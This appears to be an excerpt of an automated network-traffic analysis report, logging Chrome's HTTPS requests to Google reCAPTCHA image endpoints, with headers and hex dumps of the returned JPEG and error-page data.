                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC1378INData Raw: 3e 37 92 39 24 e0 f5 a8 2d 63 95 ae 7c d2 46 4f a1 f6 ab 82 20 f2 8f ef 63 2c d5 6e d7 39 9e a6 b6 93 6e 91 c6 24 76 6f 9b ba f5 c5 5e 68 de c2 28 89 0a ca e4 f2 4e 31 db f3 15 99 65 76 d6 e8 bb 80 65 dd 80 33 d0 f6 ab 12 48 d7 ca a1 d9 dd 56 5c 30 fe ee 40 c7 f2 fd 2b 8e 4d de dd 07 18 39 3b 88 2d e3 65 09 bd 37 ba 87 66 07 3b 46 48 c7 e5 fc e9 b8 16 97 b1 5b e0 be dc 97 6e 46 38 f6 3d 05 49 2c e5 1b cf 0e ea 51 3e 5c aa f0 72 00 fe 75 a1 a4 c6 6e e1 69 9f e5 92 4d a1 a4 c0 03 1b 46 72 7e a6 94 ae 95 fa 1d 3e c5 de e8 4d 36 d5 2d 2e 64 92 15 17 1b 86 4b 38 ce 3a 70 2b b1 f8 65 73 1d bd db 7d b5 a3 b5 0a 0b f9 8c 85 82 80 78 40 b9 19 dc 7a e3 9f 4e f5 82 96 77 09 68 c8 51 65 95 5c a9 0b f7 94 7d 05 32 da c3 54 8c 33 20 97 0d c3 6e 89 b2 79 f5 0a 33 cd 61
                                                                                                                                                                                                                                                                  Data Ascii: >79$-c|FO c,n9n$vo^h(N1eve3HV\0@+M9;-e7f;FH[nF8=I,Q>\runiMFr~>M6-.dK8:p+es}x@zNwhQe\}2T3 ny3a
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC1378INData Raw: 22 73 1b 3a 22 32 12 1c 67 b8 04 63 3d 7f ce 28 8e a0 b5 67 48 6e 8a 7c 90 5a 2b 28 18 27 cc db 93 f4 a2 aa 59 ea 0b 1c 6d fe 82 5c b3 16 27 1d ff 00 1e 68 a4 ac 53 6c f2 fd 28 65 14 80 07 96 01 3c 7d ee 2b 13 51 31 48 c4 a3 e7 1b 86 d2 31 8e 6b a3 8c 2c 16 82 34 18 66 fb c7 d3 b0 ac 57 b5 81 09 0b 79 c9 eb f3 af 15 df 18 a4 cf 32 4d ed 12 95 ad bb 0b 47 98 4d 13 44 49 0c 81 be 64 20 e3 a1 1c f6 e9 9a 63 b2 94 e6 4c 11 f8 e7 da b4 e7 b7 b4 82 d4 05 b9 0d fd ff 00 98 67 93 9c fe 75 95 7f 1c 5e 7b 1b 66 0c ac c7 18 61 c7 3f fd 6a 99 ea ee 85 28 f2 9d 1f 85 6c 0e b7 6f 32 45 04 f7 05 42 8d 90 21 2e 32 c1 38 1c e7 97 5f c4 8a bf a8 e8 10 db b5 91 ba b2 d7 63 58 a5 61 38 7b 42 bb 50 c4 30 47 1f de 1f 96 2b 8e d3 2e 0d 94 f9 32 32 93 fd de 31 df 1f 9d 7b 35 a7
                                                                                                                                                                                                                                                                  Data Ascii: "s:"2gc=(gHn|Z+('Ym\'hSl(e<}+Q1H1k,4fWy2MGMDId cLgu^{fa?j(lo2EB!.28_cXa8{BP0G+.221{5
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC761INData Raw: 0c f3 44 f4 56 43 8e e7 76 7c 67 67 6f 14 86 cb c0 fe 0e b1 67 5d bb e3 b3 e4 7e 67 1f a6 2a 8e ab f1 16 fa 7b 44 b2 36 de 1a 86 d3 24 9b 75 b1 88 c6 58 e3 e6 2a d9 19 e2 9f 17 8c f4 8b 52 59 3c 0f e0 b0 1b e5 f2 e4 b2 57 03 8e b9 e0 ff 00 fa ea c7 fc 2d 3b cb 60 5e d3 c3 1e 19 84 93 8d b1 5a b1 8c f1 ce 57 71 19 ae 0e 5f 2f eb ee 3a af 6e a7 8d 7c 41 8e 5f 3a e6 e9 ec cd bb 4b 70 59 c1 52 a2 46 25 88 91 06 31 b5 87 3c 74 3e 80 8a d7 f8 59 e1 bb bd 6b 51 d0 2d 13 cd 8d 3e d2 f7 6e ec b8 55 0a 46 7a 8c 76 ef dc 9a f4 39 fc 5d e2 4d 7e e6 2b bb 9f 0a d9 ea 91 ed 22 18 1f 4e 96 78 63 53 83 95 42 70 49 c7 de 39 3e 84 0e 2b d9 f4 fb 38 34 fb 38 61 5b 78 ac f7 a8 61 1c 49 b0 02 46 48 db d0 0f cb 15 cf 88 af 56 9a 51 82 57 ef 7d 89 8d 25 27 7b 9c 7f 8c 3c 11 a0
                                                                                                                                                                                                                                                                  Data Ascii: DVCv|ggog]~g*{D6$uX*RY<W-;`^ZWq_/:n|A_:KpYRF%1<t>YkQ->nUFzv9]M~+"NxcSBpI9>+848a[xaIFHVQW}%'{<
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  103192.168.2.1649834142.250.184.2284437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC1190OUTGET /recaptcha/api2/payload?p=06AFcWeA5VkcAf__VfTECYjxR1zEjzEeUqVCOpmy-ToMC2oDpihFBDApkF8YSBcGEFkDfjNL2dpJ0UkZxupvRNtyeNT3I-AyHNENAwb2_-DZOzGTlUQhzKcFMf65SiWoFSAE7eERvRg56uYB2WYqJiFCyof5l6Ujg7_TfkOu8WyD8wBDc7sMz5db5AsNDucIwFkZC3Wv7YQcOYnOMgB2ZRVWzf__aR6mJjrA&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=3b23377149f960fd HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:11:04 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:04 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC697INData Raw: 66 33 33 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14
                                                                                                                                                                                                                                                                  Data Ascii: f33JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC1378INData Raw: 06 c0 2c 4f 5e 9c d7 d1 5f 0b 9e 1b af 0e 35 ec 5a bd c5 fb dc 38 92 68 a4 9b cc 16 d2 11 ca 29 ea 17 da b0 c3 54 73 8d a5 b9 75 a0 a3 aa 3a 4d b5 4b 57 d4 f4 ed 32 25 fe d3 ba fb 1c 32 82 04 ee 19 63 53 ee e3 85 3e 99 22 b4 f6 d3 67 b5 b7 bc b7 7b 6b 98 52 68 5c 6d 64 75 04 11 5d 28 c4 f9 d3 e3 66 8d ab dc d9 de cf 7d ac 5c eb 56 b6 28 ee 92 c6 e9 fb 86 c8 2c 24 40 78 1d 30 46 3e e8 e3 a1 af 16 d3 c9 33 46 90 c2 65 12 a1 da c7 bf bf e9 5e eb f1 af 40 d0 74 ab 6f ec 46 b5 9a 3b a9 17 65 8d da 5c 16 67 8c e4 98 e4 5d d9 38 c7 04 f0 72 78 e2 bc fb c0 fe 16 d7 f4 df b6 6b 3a 56 9b a6 ea 0f a6 c0 25 92 3b a6 06 32 1b 39 62 a4 8c 95 03 80 3b e2 b3 ab 28 36 a2 de a3 a4 a5 ab e8 6f 78 52 c6 ef fe 11 5b cb 2d 66 7b 9b 0d 21 65 33 25 e4 53 95 b7 49 00 39 52 aa 19
                                                                                                                                                                                                                                                                  Data Ascii: ,O^_5Z8h)Tsu:MKW2%2cS>"g{kRh\mdu](f}\V(,$@x0F>3Fe^@toF;e\g]8rxk:V%;29b;(6oxR[-f{!e3%SI9R
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC1378INData Raw: eb a2 d0 35 0b 9b 66 d4 21 4b 84 b4 6c b4 26 52 15 88 3d 33 bb 9c fa d7 23 a7 15 aa 77 3a 23 37 aa 68 e7 ce ad a7 69 b6 ec 75 f4 9e ff 00 53 8d e1 fd ca a1 68 67 e5 5b 0e 36 e0 29 20 e7 9e 33 d0 d7 8d 78 b7 50 bf 8b 53 bb 8a ea 08 e2 b6 79 0c b1 25 be 00 45 25 b0 06 39 c0 c9 18 35 ee b7 de 14 d5 6e a2 77 1f 68 99 07 2e cb 24 58 1f 53 8a a3 ff 00 08 34 d7 56 73 b2 e8 cd 79 34 71 33 0c cb 6e d8 18 fc eb 58 cd 58 4c e6 63 f8 a0 3c 3f e1 86 d3 2c 2c 6e db 50 5b 78 71 72 f7 a4 ae f3 18 27 0a 72 14 0c 9c 28 e2 bc bb 52 f1 05 ce a7 76 b7 f7 d7 37 42 ee 77 33 16 32 e4 ee 07 19 e0 7b 76 ac 7b 2b bb ab fb 66 96 de d6 fe 2b 71 20 0d 3a 46 d2 46 ae 08 1c 9e 31 f7 87 7e e2 ba cd 3b 5a d1 61 b2 b4 b1 be f0 ed ae a2 e4 f9 4b 70 65 92 36 90 9e a5 be 70 06 49 1d b8 ae 4c
                                                                                                                                                                                                                                                                  Data Ascii: 5f!Kl&R=3#w:#7hiuShg[6) 3xPSy%E%95nwh.$XS4Vsy4q3nXXLc<?,,nP[xqr'r(Rv7Bw32{v{+f+q :FF1~;ZaKpe6pIL
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC445INData Raw: af f1 cf c2 80 7c 96 ba 9b ff 00 db 24 1f fb 35 7c d4 ac 31 cd 1b b1 d2 9f d4 a9 8b eb 33 67 d1 e7 e3 af 86 c1 cf d8 75 42 3f dd 8c 7f 5a 54 f8 ff 00 a0 c4 c1 a3 d2 b5 20 47 70 c8 0f f3 af 9b 59 cf 24 11 4d 32 e3 93 4f ea 54 fa 8f db cc fa 23 5a f8 dd e1 2d 59 3f e2 63 e1 99 ef 98 0c 03 32 c6 c4 0f 40 4e 48 ac 61 f1 5f c1 51 ff 00 ab f0 42 aa 8e db d3 ff 00 89 af 13 12 29 14 a8 c8 0e 5c 16 f6 07 14 be a9 4c 3d bc cf 6e 87 e3 1f 84 23 7d f0 f8 33 6b 0e e1 d0 7f ec b5 a7 07 c7 fd 3a 36 fd d6 87 a8 c2 07 4d 97 55 e0 8d 2c 0b 86 8a d9 49 1c 90 c7 39 ab 30 6a 32 ec cc 50 c3 1a e7 b2 8c fe 34 9e 16 9f 61 7b 79 9e f5 ff 00 0d 0c a7 ee 69 5a be 3f eb e6 8a f0 66 bf be 27 89 ca 8f 40 07 f8 51 47 d5 a9 8b db c8 cb 2d 9a 8e 67 3d 28 27 b1 35 0b e4 be 33 c5 76 48 c1
                                                                                                                                                                                                                                                                  Data Ascii: |$5|13guB?ZT GpY$M2OT#Z-Y?c2@NHa_QB)\L=n#}3k:6MU,I90j2P4a{yiZ?f'@QG-g=('53vH
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  104192.168.2.1649835142.250.184.2284437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC1190OUTGET /recaptcha/api2/payload?p=06AFcWeA7hWBNHMulugtwoVWu7X763ky27tPptOgTfOFgi0ix1mEsIbU1bV0fMrExjgEe-XsEDkSQQ-scQizQ4ie4ZKTRVXCMEJg7q5bRV1gkwixSdbl21ToeD4P9mpA7Laa8XaFr4zFrMcnN40ikXzItuICvb2_osnQeehe4--t1C7gr2i6nMa9QSddKi7xInP1h-SiEKj2cy6oKqzHeLl4B_GLV50U1Rqg&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=bda71fdb839543f2 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:11:05 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:05 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC697INData Raw: 66 32 39 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14
                                                                                                                                                                                                                                                                  Data Ascii: f29JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC1378INData Raw: d2 4a c3 cd 25 ee 23 0a 63 0c 3f 77 b9 ba 8f 4e 0e 78 fe 55 9c 5b 93 72 7a 1a c2 36 56 6c e8 2f 75 77 ba bc 9a e7 09 13 44 76 2b af df 20 77 07 b8 a9 f4 8d 63 55 fb 44 de 46 b3 73 00 43 fc 24 9d c3 9c 67 07 d0 55 0b fb 48 6f 1d ae 16 7b 93 fb b7 55 8d a3 0a 77 f2 33 f4 c8 e3 3d 8d 1f b8 b1 b6 69 24 92 de 15 8d f7 49 b9 b2 db 70 38 2b db b7 3d f3 55 19 bb 6a 2a 90 4a 4e cc db d3 75 a7 17 91 5f 6a ba 9b 39 cb 83 2c 84 9c f0 30 31 db ad 6b d9 ea 9a 65 e5 cd d4 70 38 94 4c 84 87 56 52 ab 81 dc 63 23 f5 ae 52 04 b0 d7 2e ed ed b4 c7 86 62 db 89 83 0c 48 24 a7 00 28 c9 e7 b0 ff 00 eb 54 f2 69 56 fa 7c a8 6e 63 86 6c 00 44 2a c5 19 49 c3 67 0e 13 23 9e d9 ea 3b 73 42 95 f5 42 45 cf 89 13 4b 6d a5 d9 4d 14 de 5c b1 ea c8 f1 b9 df 94 21 58 83 f3 0e 9f 4e 29 f7 3e
                                                                                                                                                                                                                                                                  Data Ascii: J%#c?wNxU[rz6Vl/uwDv+ wcUDFsC$gUHo{Uw3=i$Ip8+=Uj*JNu_j9,01kep8LVRc#R.bH$(TiV|nclD*Ig#;sBBEKmM\!XN)>
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC1378INData Raw: fe bf 43 df f3 ae 87 c7 7e 18 fb 6b 9d 67 47 fd ce a5 1f 2e 8b c7 9d ff 00 d9 7f 3a 1f 90 2b 1e 7a 6f 26 12 36 cd 1e 76 4e ab bb 76 71 8f 61 57 ec 6e 67 b9 0d e6 e9 b3 5b 6d fe 23 b8 86 fd 2a de 8f aa 25 fb 18 26 45 8a f1 7a c6 df 28 6f 52 3d fd aa f9 3b 07 98 92 01 83 82 0f 04 1f 4c 56 37 68 bd 05 1a 1e b6 2d be d4 34 ab e3 6f b7 70 95 60 62 98 f5 ce 3a 54 76 da 6e a7 72 09 b7 d3 ae e5 db f7 bc b8 59 b1 f9 0a da d1 bc 49 7b a6 30 30 4c c9 c7 2a 06 55 fe a0 ff 00 fa fd c5 6c c5 7b a5 ea 77 5f 68 92 d2 df 49 bc ea 97 76 ec f1 a6 7f da da 78 fa fe b5 a4 59 94 91 c1 ca 92 c5 23 47 22 f9 6e a7 05 5f e5 23 ea 0d 15 e9 57 d3 78 aa 19 84 6b 06 8b a9 a0 51 b2 e1 a1 2c 48 ed 92 4f f8 d1 5a 11 63 2f e1 57 86 5b 49 d3 ce a1 77 1e 2f ae 40 c8 23 98 d3 a8 5f af 73 f8
                                                                                                                                                                                                                                                                  Data Ascii: C~kgG.:+zo&6vNvqaWng[m#*%&Ez(oR=;LV7h-4op`b:TvnrYI{00L*Ul{w_hIvxY#G"n_#WxkQ,HOZc/W[Iw/@#_s
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC435INData Raw: a4 b6 f1 0c 2f ba 3b cd 5b e5 c9 1b a2 91 47 d3 84 fe bf fd 75 27 3b ec 0f 2d 8d fd da b1 65 1d 63 58 fe cd 99 84 fa 7e ad 21 5e 4e cb 27 c7 e6 40 1f ad 73 77 9f 12 12 12 d1 db e9 32 ee 1d e7 93 66 3f 00 0f f3 ae ca ee ff 00 c4 26 03 e6 dd 5d ca 63 19 1b b7 e4 0c e3 80 47 5a d5 f0 4d ac fe 21 7b c8 75 ab 78 ef e0 89 17 6a dc 5b 26 41 24 f7 db cf 4a d2 32 8b 76 31 af 97 54 a5 49 d5 e6 4d 23 c7 2f bc 7f af 4c 4f 92 6d ad 41 e9 e5 c7 b8 8f c5 b3 58 5a 86 b7 ab 5f e4 5d ea 37 32 a9 ea a6 43 b7 f2 1c 57 bf f8 87 e1 2f 86 75 88 64 1a 79 4d 2e ec 74 31 8e 01 f7 4c ff 00 2c 57 8c 78 e3 c0 7e 23 f0 8b 6e d4 ec bc cb 46 6c 25 e4 3f 3c 2d e9 93 8f 94 fb 1c 56 dc b6 3c be 64 ce 54 8c fa 51 4c 66 f9 ba 7e b8 a2 a6 c5 29 1f 68 95 1e 95 5d d8 8b 94 85 78 0c 33 9e f4 51
                                                                                                                                                                                                                                                                  Data Ascii: /;[Gu';-ecX~!^N'@sw2f?&]cGZM!{uxj[&A$J2v1TIM#/LOmAXZ_]72CW/udyM.t1L,Wx~#nFl%?<-V<dTQLf~)h]x3Q
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  105192.168.2.1649836142.250.186.1644437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC612OUTGET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:05 GMT
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Allow: POST
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC635INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
